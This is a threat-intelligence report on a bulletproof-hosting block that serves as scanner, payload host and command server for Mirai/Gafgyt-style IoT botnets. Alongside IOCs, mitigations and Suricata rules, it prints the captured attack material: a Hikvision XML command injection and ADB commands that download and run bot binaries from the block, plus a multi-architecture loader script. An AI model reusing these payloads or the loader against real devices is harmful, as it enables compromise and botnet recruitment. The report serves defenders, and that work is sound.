StormCloud Bulletproof Hosting — infrastructure profile
A newly-registered bulletproof ASN running one /24 as self-contained multi-tenant IoT botnet infrastructure — scan, exploit, host, and C2 all in the same block
Last updated 2026-08-01.
Executive summary
A single /24 has been running as self-contained, multi-tenant IoT botnet infrastructure against our entire fleet for over a month: the same handful of IP addresses scan for vulnerable devices, deliver the exploit, host the payload, and receive the C2 beacon, all within one block. It sits behind a bulletproof-hosting ASN that was registered just nine days before we saw it turn hostile.
94.154.43.0/24 is announced by AS219502 ("STORMCLOUD-AS"), a RIPE ASN registered 2026-06-09. Our fleet's first capture of a payload served from this block is 2026-06-28; a C2 endpoint inside the same /24 (94.154.43.46) was already live nine days earlier, on 2026-06-18, per our own MICROC2 report. Between then and today the block has hit all 44 sensors in our fleet, generating 58,365 exploit-command events from 45 distinct source IPs across six exploitation vectors, and served 406 malware samples from 22 rotating hosting IPs. The registrant behind the /24 traces to a Kharkiv, Ukraine-based operator; the ASN's sole upstream transit is Amarutu Technology Ltd, a Seychelles-registered network placed on the USTR's Notorious Markets list in 2022 for ignoring abuse takedowns.
This is not one campaign. It's shared criminal hosting. We observed at least four distinct build/naming conventions cycling through the same single IP (94.154.43.123) at different points in July: a randomized-token payload-directory loader (twice, 12 days apart, near-identical builder output both times), raw architecture-named binaries dropped at web root, a "boatnet.*"-branded release, and operator self-testing artifacts (testbot.sh). VirusTotal classifies the samples we submitted as Mirai/Gafgyt-lineage trojans and, for one build, explicitly as a DDoS agent — consistent with the operator's public marketing and with prior public research (Hunt.io, April 2026) tying the same corporate entity's infrastructure to the xlabs_v1 DDoS-for-hire IoT botnet on a sibling ASN.
Threat actor profile
The corporate entity behind this ASN, Storm Industries LLC (trading as "StormCloud"), is not a new discovery on its own: its infrastructure has prior public attribution. What's new here is identifying this specific block (94.154.43.0/24 / AS219502) as the operator's current active infrastructure, and confirming it directly against our own fleet telemetry.
176.65.139.0/24) announced by AS214472 ("Offshore LC"), a Netherlands-registered network under the same Storm Industries LLC corporate umbrella. Our own corpus independently confirms this: we captured 584 samples from 176.65.139.0/24 between 2026-04-27 and 2026-06-19 — the same window Hunt.io's report covers. Our fleet also captured the exact ADB masquerade pattern xlabs_v1 is known for (a bot binary disguised as com.supercell.clashroyal, fetched via adb:shell) from the new 94.154.43.0/24 block — see Exploit payloads. We treat this as strong circumstantial evidence of continuity between the two blocks, not confirmed attribution to the same botnet build.
| Attribute | Assessment | Confidence |
|---|---|---|
| Motivation | DDoS-for-hire / general-purpose IoT botnet recruitment. VT classifies one submitted sample as a DDoS agent and another as Mirai/Gafgyt; no crypto-mining or credential-theft behavior observed in our own captures | HIGH |
| Sophistication | Low-to-intermediate on the loader itself — a bare wget/curl/tftp multi-arch fetch chain with no sandbox-evasion logic, no persistence mechanism, no anti-forensics (contrast with MICROC2's loader, which has all three). The sophistication here is operational: automated builder tooling producing near-identical loaders on demand, and bulletproof hosting infrastructure that tolerates constant abuse. | HIGH |
| Attribution | Corporate entity identified (Storm Industries LLC / StormCloud); specific bot operator(s) using this hosting are not identified; the block hosts multiple concurrent, differently-branded builds, consistent with shared bulletproof hosting used by more than one customer | MED |
| Target profile | Broadly opportunistic — six distinct exploitation vectors observed hitting Hadoop clusters, Android/ADB devices, IP cameras (Hikvision), consumer routers (Realtek, Huawei), and generic Telnet/SSH-exposed Linux hosts, across every architecture our sandbox supports (ARM, MIPS, x86/x86_64, SH4, PowerPC, and more) | HIGH |
| Operational tempo | Continuous — 22 hosting IPs have rotated through this one /24 over 34+ days with no gap longer than a few days, and the block was still actively serving payloads and receiving exploit traffic at the time of writing | HIGH |
Infrastructure analysis
The hosting provider
| Attribute | Value |
|---|---|
| Announced prefix | 94.154.43.0/24 (single prefix originated by this ASN, RPKI-valid) |
| ASN | AS219502, name STORMCLOUD-AS |
| ASN registered | 2026-06-09 (RIPE aut-num object creation date) |
| Corporate registrant | Storm Industries LLC — registered address 1209 Mountain Road Pl NE, Albuquerque, NM, a shared registered-agent office (Northwest Registered Agent Inc.), not an operating address |
| IP block registrant | "FOP Danik Vyacheslav Evgenievich," Kharkiv, Ukraine (per RDAP) — matches the "Kharkiv, Ukraine-based reseller" WHOIS attribution our own MICROC2 report independently made for 94.154.43.46 on 2026-07-03 |
| Administrative/technical contact | "StormCloud Network Operations," Aberdare, United Kingdom; abuse contact abuse@stormindustries.llc |
| Sole upstream transit | AS206264, Amarutu Technology Ltd (Seychelles) — publicly documented bulletproof-hosting provider, also known as KoDDos, placed on the USTR's "Notorious Markets" list in 2022 for hosting large piracy operations and ignoring DMCA/abuse takedowns |
| Public marketing | The operator's own site (stormcloud.pw) advertises "zero data collection," no KYC/identity verification, and cryptocurrency-only payment: self-described bulletproof hosting |
| Routing hygiene | Publicly-observed BGP monitoring notes this ASN announcing bogon space — a common signal of loose or deliberately permissive network operations |
One data point we could not reconcile: a live spur.us lookup on the currently-active hosting IP (94.154.43.123) attributes it to a different ASN, 48678 ("Pentech Bilisim Teknolojileri," Turkey), while RIPE RDAP and BGP routing tables both show AS219502. This could reflect a recent transit/reseller change, a multihomed announcement, or simply a stale record in one of the two sources — we're flagging the discrepancy rather than resolving it. spur.us does independently flag the IP's traffic with an OPEN_PROXY_USER client-behavior tag, consistent with abuse-heavy usage regardless of which ASN record is current.
Self-contained infrastructure: scanner, host, and C2 in one block
Correlating our sample-capture records against the honeypot session that triggered each capture shows the same IP inside 94.154.43.0/24 acting as both the exploiting/scanning source and the payload host in the large majority of cases (e.g. 94.154.43.10 both scanned and served from 94.154.43.10; 94.154.43.123 both scanned and served from 94.154.43.123). Live sandbox detonation of samples pulled from this block confirms the pattern extends to command-and-control: of 37 distinct C2 endpoints observed across detonations, the large majority beacon back into the same 94.154.43.0/24 block on non-standard high ports (18129, 6621, 8060, 9111, 60195, 1337, and others) rather than to separate, dedicated C2 infrastructure. A minority of builds beacon externally (195.96.135.248:8529, seen 6 times; 65.222.202.53:80, seen 3 times) — see Malware analysis.
Rotating hosting IPs (34-day window)
| IP | Samples served | First seen | Last seen |
|---|---|---|---|
94.154.43.123 | 60 | 2026-07-19 | 2026-07-31 |
94.154.43.95 | 40 | 2026-07-06 | 2026-07-27 |
94.154.43.88 | 31 | 2026-07-28 | 2026-07-28 |
94.154.43.192 | 30 | 2026-07-05 | 2026-07-12 |
94.154.43.91 | 29 | 2026-07-22 | 2026-07-23 |
94.154.43.46 | 23 | 2026-07-16 | 2026-07-30 |
94.154.43.51 | 22 | 2026-07-14 | 2026-07-14 |
94.154.43.10 | 21 | 2026-07-12 | 2026-07-26 |
94.154.43.68 | 20 | 2026-07-05 | 2026-07-26 |
94.154.43.77 | 16 | 2026-07-05 | 2026-07-06 |
94.154.43.37 | 15 | 2026-07-10 | 2026-07-10 |
94.154.43.61 | 15 | 2026-07-10 | 2026-07-10 |
94.154.43.70 | 14 | 2026-07-09 | 2026-07-09 |
94.154.43.5 | 14 | 2026-06-29 | 2026-06-29 |
94.154.43.96 | 13 | 2026-07-22 | 2026-07-27 |
94.154.43.87 | 12 | 2026-06-28 | 2026-07-19 |
94.154.43.115 | 12 | 2026-07-22 | 2026-07-22 |
94.154.43.164 | 9 | 2026-07-21 | 2026-07-30 |
94.154.43.191 | 7 | 2026-07-23 | 2026-07-23 |
94.154.43.116 | 1 | 2026-07-12 | 2026-07-12 |
94.154.43.92 | 1 | 2026-07-22 | 2026-07-22 |
94.154.43.148 | 1 | 2026-07-29 | 2026-07-29 |
Activity is confined to this /24 specifically; no payload activity was found in the neighboring 94.154.40.0/22, 94.154.44.0/23, or 94.154.46.0/24 ranges that also fall under the same parent RIPE allocation.
Malware analysis
We submitted four representative samples, spanning both loader scripts and compiled binaries, to VirusTotal for fresh analysis:
| SHA256 (short) | Type | Detections | VT Threat Label |
|---|---|---|---|
217da271…c14a5 |
POSIX shell loader (2026-07-19 build) | 27 / 62 | trojan.shell/abdownloader (Lionic tags it Trojan.Linux.Gafgyt.m!c) |
2fa5afc0…1d6e0 |
POSIX shell loader (2026-07-31 build) | 14 / 62 | downloader.bash/crit |
30883509…d694 |
ELF 32-bit ARM ("boatnet.arm") |
33 / 63 | trojan.mirai/gafgyt |
9b6260c8…8a28 |
ELF 32-bit ARM, 10.1 MB (unusually large — likely Go-based) | 24 / 63 | trojan.ddos/ddosagent |
The two loader scripts, captured 12 days apart under different random path tokens, are near-byte-identical templates — same architecture-detection case statement, same wget/curl/tftp fallback chain, same obfuscated cache-busting query token built from a chain of randomly-named shell variables, and the same spoofed User-Agent on every fetch:
Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Valve Steam Gamepad/1708467439 (SteamOS)
This is generated output from a builder tool, not hand-written per session, a strong fingerprint for correlating future captures back to this operator even after the hosting IP rotates again.
File type diversity
The 406 captured samples span 20 distinct architecture/format combinations — ARM (32- and 64-bit), Intel x86/x86-64, MIPS (LE and BE), PowerPC, SPARC, Renesas SH, ARC, RISC-V, and more — the standard Mirai-derivative "compile for everything, let the loader pick" approach.
Sandbox detonation
394 detonation attempts were run against samples from this block across 8 architectures our sandbox supports:
| Architecture | Attempts | Booted | Executed |
|---|---|---|---|
| ARM | 117 | 117 | 112 |
| i386 | 56 | 56 | 52 |
| MIPS | 35 | 35 | 33 |
| MIPS (LE) | 32 | 32 | 30 |
| SH4 | 29 | 29 | 29 |
| x86_64 | 23 | 23 | 21 |
| ARM64 | 7 | 7 | 6 |
Where our sandbox could identify and boot the target architecture, execution succeeded roughly 95% of the time: these are functioning, not broken, builds. (95 additional attempts against unrecognized/unsupported architecture formats are excluded from the table; they never booted.)
Observed TTPs — MITRE ATT&CK
| Technique | ID | Evidence |
|---|---|---|
| Exploit Public-Facing Application | T1190 | Unauthenticated Hadoop YARN ResourceManager RCE (45,095 events, dominant vector), Hikvision IP-camera Apache RCE via XML command injection, Realtek/Huawei SOAP UPnP RCE |
| Exploitation of Remote Services | T1210 | Exposed Android Debug Bridge (ADB) abuse, 12,032 events — matches the ADB-targeting M.O. documented for this operator's prior xlabs_v1 infrastructure |
| Ingress Tool Transfer | T1105 | wget/curl/tftp fallback chain fetching architecture-matched payload from the same or a sibling IP in the /24 |
| Command and Scripting Interpreter: Unix Shell | T1059.004 | POSIX /bin/sh loader scripts driving the entire fetch-and-execute chain |
| Masquerading | T1036 | ADB-delivered payload written to disk and executed as com.supercell.clashroyal, disguised as a legitimate Android game package |
| Indicator Removal | T1070 | Loader deletes the fetched binary from disk immediately after confirming it launched successfully |
| Network Denial of Service | T1498 | VirusTotal classifies one submitted build as a DDoS agent; consistent with the operator's public marketing and Hunt.io's prior characterization of the same corporate entity's infrastructure as DDoS-for-hire. Not directly observed as an executed attack in our own detonations for this specific sample set (contrast MICROC2, where a live flood was captured) — included on classification and lineage evidence, not direct behavioral confirmation. |
Activity timeline
176.65.139.0/24 (AS214472, "Offshore LC") — the same window Hunt.io's xlabs_v1 report covers, and the same corporate operator (Storm Industries LLC) as the block this report covers.94.154.43.46 — inside the block this report covers — is already live as an active C2, nine days after the ASN's registration.94.154.43.87), alongside the first Hikvision-vector exploit commands referencing the block, hitting 4 sensors within 10 minutes.com.supercell.clashroyal across 4 sensors.94.154.43.123) serves two separate loader waves, 12 days apart, using near-identical builder-generated scripts under different random path tokens.Exploit payloads
Hikvision IP camera — Apache RCE via XML command injection
<?xml version="1.0" encoding="UTF-8"?><language>$(cd /tmp;/bin/busybox wget -q http://94.154.43.87/wget.sh -O .ww;sh .ww multi.hikvision)</language>
Identical across all four sensors it hit within a 9-minute window on 2026-06-28, with a fixed multi.hikvision argument identifying the exploited device class to the fetched script.
Exposed Android Debug Bridge (ADB) — masquerading payload
toybox wget http://94.154.43.48/rebirth.arm7 -O /data/local/tmp/com.supercell.clashroyal
chmod 777 /data/local/tmp/com.supercell.clashroyal
./data/local/tmp/com.supercell.clashroyal adb
The same three-line sequence (tried with both toybox and busybox as fallbacks) was captured identically across every ADB-vector hit, disguising the payload as a popular mobile game's package name.
Unauthenticated Hadoop YARN ResourceManager RCE — dominant vector by volume
This is the same misconfiguration class covered in depth in our MICROC2 report, and the single largest vector observed here by event count (45,095 of 58,365 total). We did not re-derive per-event detail for this report; see MICROC2 for the full exploitation mechanics.
Loader script — architecture detection and fetch chain
#!/bin/sh
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
N=$(head -c 32 /dev/urandom 2>/dev/null | tr -dc 'a-z' | head -c 6)
ARCH=$(uname -m 2>/dev/null)
case "$ARCH" in
x86_64|amd64) ARCH="x86_64" ;;
aarch64|arm64) ARCH="aarch64" ;;
armv7*|armv7l) ARCH="armv7l" ;;
# ... full case covers armv4-7, mips/mipsel/mips64, ppc, sh4, i486-i686, m68k, s390x, riscv64
esac
fetch() {
# tries wget, then curl, then tftp, in that order
wget -q -U "$UA" -O "$O" "$U?t=$T" 2>/dev/null && return 0
curl -s -A "$UA" -o "$O" "$U?t=$T" 2>/dev/null && return 0
tftp -g -r "$F" "$H" 2>/dev/null && mv "$F" "$O" 2>/dev/null && return 0
}
try_run() {
fetch "$URL" "$N" || return 1
chmod +x "$N" 2>/dev/null
./"$N" /dev/null 2>&1 &
sleep 1
kill -0 $PID 2>/dev/null && { rm -f "$N" 2>/dev/null; exit 0; } # success: cover tracks
rm -f "$N" 2>/dev/null; return 1
}
# PRIMARY selected by uname -m match; on failure, walks the full FALLBACK
# list of every other architecture's binary until one launches successfully.
No sandbox/VM detection, no persistence installation, no log tampering — this loader's only "evasion" is deleting the dropped binary once it confirms the process is still alive one second after launch. Compare this to MICROC2's loader, which included all of the above; this is a simpler, more disposable tool, consistent with high-volume, low-effort deployment rather than a single high-value operation.
Indicators of compromise
Network infrastructure
Hosting IPs (22, see full table with dates in Infrastructure analysis)
94.154.43.5, 94.154.43.10, 94.154.43.37, 94.154.43.46, 94.154.43.51, 94.154.43.61, 94.154.43.68, 94.154.43.70, 94.154.43.77, 94.154.43.87, 94.154.43.88, 94.154.43.91, 94.154.43.92, 94.154.43.95, 94.154.43.96, 94.154.43.115, 94.154.43.116, 94.154.43.123, 94.154.43.148, 94.154.43.164, 94.154.43.191, 94.154.43.192
File IOCs
| SHA256 | Type | VT |
|---|---|---|
217da2717f538903ab31fd688baef1d0d609d8ffd7d589066707cd91ba3a3525 |
POSIX shell loader | 27/62 |
2fa5afc0bb425eeb9f9c4a653e6721c7545b798074049129e7ecdee7fd61d6e0 |
POSIX shell loader | 14/62 |
3088350951e0216a5e0397d30687153ce3a96fe137bf5e9e603428dde2ddd694 |
ELF ARM (boatnet.arm) | 33/63 |
9b6260c893ac891a35655463a7dcbf150a89af51b1eeebfa0514d61689ca8a28 |
ELF ARM, 10.1MB | 24/63 |
402 further samples were captured from this block; SHA256 list available on request via the fleet's investigation tooling.
Mitigations and detection
| Action | Priority | Detail |
|---|---|---|
| Block the full /24 at the perimeter | HIGH | Individual-IP blocking is ineffective given the observed rotation (22 IPs across 34 days); block 94.154.43.0/24 outbound and inbound |
| Disable/authenticate ADB on Internet-facing devices | HIGH | Android TV boxes, set-top boxes, and dev devices with ADB reachable over the network are a primary vector here and for this operator's prior xlabs_v1 activity |
| Disable unauthenticated Hadoop YARN REST API | HIGH | See MICROC2 report for full detail — this is the single largest vector by volume in this dataset too |
| Patch/isolate IP cameras and consumer routers | MED | Hikvision, Realtek eCos-based, and Huawei HG532 devices should not be directly Internet-exposed |
| Hunt for the fixed beacon User-Agent | MED | Outbound HTTP requests carrying the "Valve Steam Gamepad/1708467439 (SteamOS)" UA string from non-gaming infrastructure is a strong signal |
Detection signatures
# Suricata/Snort — loader fetch from the StormCloud block
alert http any any -> any any (msg:"StormCloud bulletproof-net loader fetch"; \
content:"94.154.43."; http_header; \
content:"payload/"; http_uri; \
flow:established,to_server; sid:9920101; rev:1;)
# Suricata — fixed beacon User-Agent
alert http $HOME_NET any -> any any (msg:"StormCloud loader beacon UA"; \
content:"Valve Steam Gamepad/1708467439 (SteamOS)"; http_user_agent; \
flow:established,to_server; sid:9920102; rev:1;)
# Suricata — Hikvision XML command injection referencing this block
alert http any any -> $HOME_NET any (msg:"Hikvision XML RCE - StormCloud payload"; \
content:"$("; http_client_body; \
content:"94.154.43."; http_client_body; \
flow:established,to_server; sid:9920103; rev:1;)
# Suricata — ADB masquerade payload
alert tcp any any -> $HOME_NET 5555 (msg:"ADB StormCloud payload - fake package name"; \
content:"com.supercell.clashroyal"; \
flow:established,to_server; sid:9920104; rev:1;)
# Suricata — outbound to the full /24
alert ip $HOME_NET any -> 94.154.43.0/24 any (msg:"Outbound to StormCloud bulletproof net"; \
sid:9920105; rev:1;)
Collection methodology
All data in this report was collected organically by a distributed SSH/Telnet honeypot fleet deployed across multiple cloud providers and geographic regions. Fleet nodes also run alternate-protocol lure daemons that capture exploitation attempts against commonly-targeted services beyond SSH/Telnet, including the Hadoop YARN, ADB, SOAP/UPnP, and Apache/IP-camera vectors covered in this report.
Payloads were fetched by the fleet's automated pipeline at first capture. Representative samples were detonated in an isolated sandbox environment with network egress routed through a residential-style VPN for realistic network conditions; no interaction with victim networks occurred beyond passive observation of traffic the samples themselves generated. VirusTotal file, ASN, and routing lookups were performed via the fleet's own investigation tooling and live RDAP/BGP queries as part of this investigation.